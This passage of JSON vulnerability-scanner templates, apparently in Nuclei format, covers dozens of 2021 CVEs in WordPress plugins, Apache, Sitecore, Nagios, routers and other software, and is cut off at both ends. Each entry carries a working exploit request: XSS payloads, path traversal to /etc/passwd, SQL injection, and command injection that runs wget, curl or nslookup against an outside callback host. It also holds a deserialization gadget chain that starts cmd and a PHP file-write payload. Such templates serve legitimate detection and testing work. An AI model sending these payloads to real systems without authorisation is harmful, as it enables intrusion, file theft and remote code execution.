application/x-www-form-urlencoded\n\nid=1&firstname=Administrator%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&lastname=Admin&username=admin\n","GET /admin/?page=user HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(header_3, 'text/html')","status_code_3 == 200","contains(body_3, \"Administrator\\\"><script>alert(document.domain)</script> Admin\")"],"condition":"and"}]}]},{"id":"CVE-2021-36749","info":{"name":"Apache Druid - Local File Inclusion","severity":"medium"},"requests":[{"raw":["POST /druid/indexer/v1/sampler?for=connect HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"type\":\"index\",\"spec\":{\"type\":\"index\",\"ioConfig\":{\"type\":\"index\",\"firehose\":{\"type\":\"http\",\"uris\":[\" file:///etc/passwd \"]}},\"dataSchema\":{\"dataSource\":\"sample\",\"parser\":{\"type\":\"string\", \"parseSpec\":{\"format\":\"regex\",\"pattern\":\"(.*)\",\"columns\":[\"a\"],\"dimensionsSpec\":{},\"timestampSpec\":{\"column\":\"no_ such_ column\",\"missingValue\":\"2010-01-01T00:00:00Z\"}}}}},\"samplerConfig\":{\"numRows\":500,\"timeoutMs\":15000}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","druid:*:1000:1000:"],"condition":"or"}]}]},{"id":"CVE-2021-24278","info":{"name":"WordPress Contact Form 7 <2.3.4 - Arbitrary Nonce Generation","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-admin/admin-ajax.php"],"body":"action=wpcf7r_get_nonce&param=wp_rest","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["\"success\":true","\"nonce\":\"[a-f0-9]+\""],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["\"nonce\":\"[a-f0-9]+\""],"part":"body"}]}]},{"id":"CVE-2021-43831","info":{"name":"Gradio < 2.5.0 - Arbitrary File Read","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/file/../../../../../../../../../../../../../../../../../..{{path}}"],"payloads":{"path":["/etc/passwd","/windows/win.ini"]},"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:","\\[(font|extension|file)s\\]"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-40972","info":{"name":"Spotweb <= 1.5.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /install.php?page=4 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsettingsform[mail]=pdteam'+onclick='alert(document.domain)\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["onclick='alert(document.domain)","Spotweb"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25111","info":{"name":"WordPress English Admin <1.5.2 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=heartbeat&admin_custom_language_toggle=1&admin_custom_language_return_url=https://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2021-42627","info":{"name":"D-Link DIR-615 - Unauthorized Access","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wan.htm"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["src='menu.js?v=\"+Math.random()+\"'></scr\"+\"ipt>\");","var ipv6conntype"],"condition":"and"},{"type":"word","part":"header","words":["Virtual Web"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-30461","info":{"name":"VoipMonitor <24.61 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /index.php HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nContent-Type: application/x-www-form-urlencoded\n\nSPOOLDIR=test\".system(id).\"&recheck=Recheck\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["uid=","gid=","groups=","VoIPmonitor installation"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24875","info":{"name":"WordPress eCommerce Product Catalog <3.0.39 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/edit.php?post_type=al_product&page=product-settings.php&ic-settings-search=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29%2F%2F HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"alert(document.domain)\")","contains(body_2, \"eCommerce Product Catalog\")"],"condition":"and"}]}]},{"id":"CVE-2021-32820","info":{"name":"Express-handlebars - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/?layout=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","daemon:[x*]:0:0:","operator:[x*]:0:0:"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-39350","info":{"name":"FV Flowplayer Video Player WordPress plugin  - Authenticated Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=fv_player_stats&player_id=1</script><script>alert(document.domain)</script> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>","<h1>FV Player Stats</h1>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-29200","info":{"name":"Apache OFBiz < 17.12.07 - Arbitrary Code Execution","severity":"critical"},"requests":[{"raw":["POST /webtools/control/SOAPService HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n  <soapenv:Header/>\n    <soapenv:Body>\n      <ser>\n        <map-HashMap>\n          <map-Entry>\n            <map-Key>\n              <cus-obj>{{generate_java_gadget(\"dns\", \"http://{{interactsh-url}}\", \"hex\")}}</cus-obj>\n            </map-Key>\n            <map-Value>\n              <std-String value=\"STDSTRING\"/>\n            </map-Value>\n          </map-Entry>\n        </map-HashMap>\n     </ser>\n  </soapenv:Body>\n</soapenv:Envelope>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["value=\"responseMessage\""]}]}]},{"id":"CVE-2021-25297","info":{"name":"Nagios 5.5.6-5.7.5 - Authenticated Remote Command Injection","severity":"high"},"requests":[{"raw":["GET /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\n","POST /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnsp={{nsp}}&pageopt=login&username={{username}}&password={{password}}\n","GET /nagiosxi/index.php HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 20s\nGET /nagiosxi/config/monitoringwizard.php?update=1&nsp={{nsp_auth}}&nextstep=3&wizard=switch&ip_address=127.0.0.1%22%3b%20wget%20{{interactsh-url}}%3b&snmpopts%5bsnmpcommunity%5d=public&scaninterfaces=on HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body_4","words":["<b>Ping</b>","Switch Details"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"nsp","group":1,"regex":["name=['\"]nsp['\"] value=['\"](.*)['\"]>"],"internal":true,"part":"body"},{"type":"regex","name":"nsp_auth","group":1,"regex":["var nsp_str = ['\"](.*)['\"];"],"internal":true,"part":"body"}]}]},{"id":"CVE-2021-31862","info":{"name":"SysAid 20.4.74 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/KeepAlive.jsp?stamp=%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers":[{"type":"dsl","dsl":["(body == \"false <script>alert(document.domain)</script>\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2021-30213","info":{"name":"Knowage Suite 7.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/knowage/servlet/AdapterHTTP?Page=LoginPage&NEW_SESSION=TRUE&TargetService=%2Fknowage%2Fservlet%2FAdapterHTTP%3FPage%3DLoginPage%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24791","info":{"name":"Header Footer Code Manager < 1.1.14 - Admin+ SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","@timeout: 20s\nGET /wp-admin/admin.php?page=hfcm-list&orderby=%28SELECT+5619+FROM+%28SELECT%28SLEEP%286%29%29%29uWCv%29&order=DESC HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2,\"Add New Snippet\")"],"condition":"and"}]}]},{"id":"CVE-2021-20167","info":{"name":"Netgear RAX43 1.0.3.96 - Command Injection/Authentication Bypass Buffer Overrun","severity":"high"},"requests":[{"raw":["POST /cgi-bin/readycloud_control.cgi?1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111/api/users HTTP/1.1\nHost: {{Hostname}}\n\n\"name\":\"';$(curl {{interactsh-url}});'\",\n\"email\":\"a@b.c\"\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}]}]},{"id":"CVE-2021-25075","info":{"name":"WordPress Duplicate Page or Post <1.5.1 - Cross-Site Scripting","severity":"low"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","POST /wp-admin/admin-ajax.php?action=wprss_fetch_items_row_action HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\naction=wpdevart_duplicate_post_parametrs_save_in_db&title_prefix=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28%2fXSS%2f%29+p\n","GET /wp-admin/admin.php?page=wpda_duplicate_post_menu HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["style=animation-name:rotation onanimationstart=alert(/XSS/) p","toplevel_page_wpda_duplicate_post_menu"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-26598","info":{"name":"ImpressCMS <1.4.3 - Incorrect Authorization","severity":"medium"},"requests":[{"raw":["GET /misc.php?action=showpopups&type=friend HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36\n","GET /include/findusers.php?token={{token}} HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["last_login","user_regdate","uname"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"token","group":1,"regex":["REQUEST' value='(.*?)'","REQUEST\" value=\"(.*?)\""],"internal":true}]}]},{"id":"CVE-2021-24214","info":{"name":"WordPress OpenID Connect Generic Client 3.8.0-3.8.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/daggerhart-openid-connect-generic/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["OpenID Connect Generic Client"]}]},{"method":"GET","path":["{{BaseURL}}/wp-login.php?login-error=<script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["ERROR (<script>alert(document.domain)</script>):","Login with OpenID Connect"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-38314","info":{"name":"WordPress Redux Framework <=4.2.11 - Information Disclosure","severity":"medium"},"requests":[{"raw":["GET /wp-admin/admin-ajax.php?action={{md5(replace('http://HOST/-redux','HOST',Hostname))}} HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","GET /wp-admin/admin-ajax.php?action={{md5(replace('https://HOST/-redux','HOST',Hostname))}} HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["len(body)<50"]},{"type":"regex","name":"meme","part":"body","regex":["[a-f0-9]{32}"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["[a-f0-9]{32}"],"part":"body"}]}]},{"id":"CVE-2021-42667","info":{"name":"Online Event Booking and Reservation System 2.3.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nname={{username}}&pwd={{password}}\n","GET /views/?v=USER&ID=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2Cmd5({{num}})%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%3B--%20- HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24215","info":{"name":"Controlled Admin Access WordPress Plugin <= 1.4.0 - Improper Access Control & Privilege Escalation","severity":"critical"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/options.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"This page allows direct access to your site settings\") && contains(body_2, \"Controlled Admin Access\")"],"condition":"and"}]}]},{"id":"CVE-2021-39327","info":{"name":"WordPress BulletProof Security 5.1 Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/bps-backup/logs/db_backup_log.txt","{{BaseURL}}/wp-content/plugins/bulletproof-security/admin/htaccess/db_backup_log.txt"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["BPS DB BACKUP LOG","=================="],"condition":"and"},{"type":"regex","negative":true,"part":"body","regex":["^BPS\\sDB\\sBACKUP\\sLOG\\r\\n==================\\r\\n==================\\r\\n\\r\\n$"]},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-40661","info":{"name":"IND780 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/IND780/excalweb.dll?webpage=../../AutoCE.ini"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["ExePath=\\Windows","WorkDir=\\Windows"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-40150","info":{"name":"Reolink E1 Zoom Camera <=3.0.0.716 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/conf/nginx.conf"],"matchers-condition":"and","matchers":[{"type":"word","words":["server","listen","fastcgi"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-34643","info":{"name":"WordPress Skaut Bazar <1.3.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/options-general.php/</script><script>alert(document.domain)</script>/?page=skatubazar_option HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24510","info":{"name":"WordPress MF Gig Calendar <=1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=mf_gig_calendar&action=edit&id=\"></script><script>alert(document.domain)</script><\" HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-43734","info":{"name":"kkFileview v4.0.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/getCorsFile?urlPath=file:///etc/passwd","{{BaseURL}}/getCorsFile?urlPath=file:///c://windows/win.ini"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:","for 16-bit app support"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24409","info":{"name":"Prismatic < 2.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/options-general.php?page=prismatic&tab=%22+style%3Danimation-name%3Arotation+onanimationend%3Dalert(document.domain)%2F%2F%22 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"Leave A Review?\")","contains(body_2, \"onanimationend=alert(document.domain)\")"],"condition":"and"}]}]},{"id":"CVE-2021-41773","info":{"name":"Apache 2.4.49 - Path Traversal and Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1\nHost: {{Hostname}}\n","GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd HTTP/1.1\nHost: {{Hostname}}\n","POST /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\necho Content-Type: text/plain; echo; {{cmd}}\n"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"word","name":"RCE","words":["CVE-2021-41773-POC"]},{"type":"regex","name":"LFI","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2021-33564","info":{"name":"Ruby Dragonfly <1.4.0 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/system/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ==","{{BaseURL}}/system/refinery/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ=="],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-20323","info":{"name":"Keycloak 10.0.0 - 18.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/auth/realms/master/clients-registrations/default","{{BaseURL}}/auth/realms/master/clients-registrations/openid-connect","{{BaseURL}}/realms/master/clients-registrations/default","{{BaseURL}}/realms/master/clients-registrations/openid-connect"],"body":"{\"Test<img src=x onerror=alert(document.domain)>\":1}","stop-at-first-match":true,"headers":{"Content-Type":"application/json"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Unrecognized field \"Test<img src=x onerror=alert(document.domain)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[400]}]}]},{"id":"CVE-2021-38146","info":{"name":"Wipro Holmes Orchestrator 20.4.1 - Arbitrary File Download","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/home/download"],"headers":{"Content-Type":"application/json"},"body":"{\n  \"SearchString\": \"C:/Windows/Win.ini\",\n  \"Msg\": \"\"\n}\n","matchers-condition":"and","matchers":[{"type":"word","words":["[fonts]","[extensions]","[files]"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-40870","info":{"name":"Aviatrix Controller 6.x before 6.5-1804.1922 - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /v1/backend1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nCID=x&action=set_metric_gw_selections&account_name=/../../../var/www/php/{{randstr}}.php&data=<?php echo md5(\"{{string}}\");unlink(__FILE__);?>\n","GET /v1/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["{{md5(string)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-42237","info":{"name":"Sitecore Experience Platform Pre-Auth RCE","severity":"critical"},"requests":[{"raw":["POST /sitecore/shell/ClientBin/Reporting/Report.ashx HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml\n\n<?xml version=\"1.0\" ?>\n<a>\n    <query></query>\n    <source>foo</source>\n    <parameters>\n        <parameter name=\"\">\n            <ArrayOfstring z:Id=\"1\" z:Type=\"System.Collections.Generic.SortedSet`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]\" z:Assembly=\"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\"\n                xmlns=\"http://schemas.microsoft.com/2003/10/Serialization/Arrays\"\n                xmlns:i=\"http://www.w3.org/2001/XMLSchema-instance\"\n                xmlns:x=\"http://www.w3.org/2001/XMLSchema\"\n                xmlns:z=\"http://schemas.microsoft.com/2003/10/Serialization/\">\n                <Count z:Id=\"2\" z:Type=\"System.Int32\" z:Assembly=\"0\"\n                    xmlns=\"\">2</Count>\n                <Comparer z:Id=\"3\" z:Type=\"System.Collections.Generic.ComparisonComparer`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]\" z:Assembly=\"0\"\n                    xmlns=\"\">\n                    <_comparison z:Id=\"4\" z:FactoryType=\"a:DelegateSerializationHolder\" z:Type=\"System.DelegateSerializationHolder\" z:Assembly=\"0\"\n                        xmlns=\"http://schemas.datacontract.org/2004/07/System.Collections.Generic\"\n                        xmlns:a=\"http://schemas.datacontract.org/2004/07/System\">\n                        <Delegate z:Id=\"5\" z:Type=\"System.DelegateSerializationHolder+DelegateEntry\" z:Assembly=\"0\"\n                            xmlns=\"\">\n                            <a:assembly z:Id=\"6\">mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</a:assembly>\n                            <a:delegateEntry z:Id=\"7\">\n                                <a:assembly z:Ref=\"6\" i:nil=\"true\"/>\n                                <a:delegateEntry i:nil=\"true\"/>\n                                <a:methodName z:Id=\"8\">Compare</a:methodName>\n                                <a:target i:nil=\"true\"/>\n                                <a:targetTypeAssembly z:Ref=\"6\" i:nil=\"true\"/>\n                                <a:targetTypeName z:Id=\"9\">System.String</a:targetTypeName>\n                                <a:type z:Id=\"10\">System.Comparison`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]</a:type>\n                            </a:delegateEntry>\n                            <a:methodName z:Id=\"11\">Start</a:methodName>\n                            <a:target i:nil=\"true\"/>\n                            <a:targetTypeAssembly z:Id=\"12\">System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</a:targetTypeAssembly>\n                            <a:targetTypeName z:Id=\"13\">System.Diagnostics.Process</a:targetTypeName>\n                            <a:type z:Id=\"14\">System.Func`3[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]</a:type>\n                        </Delegate>\n                        <method0 z:Id=\"15\" z:FactoryType=\"b:MemberInfoSerializationHolder\" z:Type=\"System.Reflection.MemberInfoSerializationHolder\" z:Assembly=\"0\"\n                            xmlns=\"\"\n                            xmlns:b=\"http://schemas.datacontract.org/2004/07/System.Reflection\">\n                            <Name z:Ref=\"11\" i:nil=\"true\"/>\n                            <AssemblyName z:Ref=\"12\" i:nil=\"true\"/>\n                            <ClassName z:Ref=\"13\" i:nil=\"true\"/>\n                            <Signature z:Id=\"16\" z:Type=\"System.String\" z:Assembly=\"0\">System.Diagnostics.Process Start(System.String, System.String)</Signature>\n                            <Signature2 z:Id=\"17\" z:Type=\"System.String\" z:Assembly=\"0\">System.Diagnostics.Process Start(System.String, System.String)</Signature2>\n                            <MemberType z:Id=\"18\" z:Type=\"System.Int32\" z:Assembly=\"0\">8</MemberType>\n                            <GenericArguments i:nil=\"true\"/>\n                        </method0>\n                        <method1 z:Id=\"19\" z:FactoryType=\"b:MemberInfoSerializationHolder\" z:Type=\"System.Reflection.MemberInfoSerializationHolder\" z:Assembly=\"0\"\n                            xmlns=\"\"\n                            xmlns:b=\"http://schemas.datacontract.org/2004/07/System.Reflection\">\n                            <Name z:Ref=\"8\" i:nil=\"true\"/>\n                            <AssemblyName z:Ref=\"6\" i:nil=\"true\"/>\n                            <ClassName z:Ref=\"9\" i:nil=\"true\"/>\n                            <Signature z:Id=\"20\" z:Type=\"System.String\" z:Assembly=\"0\">Int32 Compare(System.String, System.String)</Signature>\n                            <Signature2 z:Id=\"21\" z:Type=\"System.String\" z:Assembly=\"0\">System.Int32 Compare(System.String, System.String)</Signature2>\n                            <MemberType z:Id=\"22\" z:Type=\"System.Int32\" z:Assembly=\"0\">8</MemberType>\n                            <GenericArguments i:nil=\"true\"/>\n                        </method1>\n                    </_comparison>\n                </Comparer>\n                <Version z:Id=\"23\" z:Type=\"System.Int32\" z:Assembly=\"0\"\n                    xmlns=\"\">2</Version>\n                <Items z:Id=\"24\" z:Type=\"System.String[]\" z:Assembly=\"0\" z:Size=\"2\"\n                    xmlns=\"\">\n                    <string z:Id=\"25\"\n                        xmlns=\"http://schemas.microsoft.com/2003/10/Serialization/Arrays\">/c nslookup {{interactsh-url}}</string>\n                    <string z:Id=\"26\"\n                        xmlns=\"http://schemas.microsoft.com/2003/10/Serialization/Arrays\">cmd</string>\n                </Items>\n            </ArrayOfstring>\n        </parameter>\n    </parameters>\n</a>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["System.ArgumentNullException"]}]}]},{"id":"CVE-2021-37589","info":{"name":"Virtua Software Cobranca <12R - Blind SQL Injection","severity":"high"},"requests":[{"raw":["POST /controller/origemdb.php?idselorigem=ATIVOS HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n","POST /controller/login.php?acao=autenticar HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\n\nidusuario='&idsenha=test&tipousr=Usuario\n","POST /controller/login.php?acao=autenticar HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\n\nidusuario=''&idsenha=a&tipousr=Usuario\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_3, \"Os parametros n\u00e3o est\u00e3o informados corretamente\")","contains(body_3, \"O CNPJ dos parametro n\u00e3o est\u00e1 informado corretamente\")"],"condition":"or"},{"type":"dsl","dsl":["status_code_2 == 500 && status_code_3 == 200"]}]}]},{"id":"CVE-2021-3297","info":{"name":"Zyxel NBG2105 V1.00(AAGU.2)C0 - Authentication Bypass","severity":"high"},"requests":[{"raw":["GET /status.htm 